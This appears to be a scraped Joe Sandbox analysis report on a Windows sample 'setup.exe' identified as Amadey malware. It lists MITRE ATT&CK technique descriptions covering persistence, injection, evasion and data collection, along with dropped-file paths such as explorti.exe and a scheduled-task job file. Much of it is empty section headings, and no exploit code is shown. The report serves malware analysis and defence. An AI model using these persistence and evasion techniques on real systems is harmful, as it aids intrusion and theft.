Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report setup.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Amadey

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\putty[1].exe

C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe:Zone.Identifier

C:\Users\user\AppData\Local\Temp\1000009001\putty.exe

C:\Windows\Tasks\explorti.job

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Windows Analysis Report
setup.exe

Function 0028BD60 Relevance: 21.3, APIs: 5, Strings: 7, Instructions: 310
networkfileCOMMON

Function 002865B0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 257
COMMON

Function 00293550 Relevance: 53.3, APIs: 1, Strings: 29, Instructions: 761
COMMON

Function 00285DF0 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 364
COMMON

Function 00287D00 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 392
COMMON

Function 002B6E01 Relevance: 4.6, APIs: 3, Instructions: 145
COMMON

Function 002882B0 Relevance: 1.7, APIs: 1, Instructions: 159
COMMON

Function 002B6C99 Relevance: 1.6, APIs: 1, Instructions: 89
COMMON

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre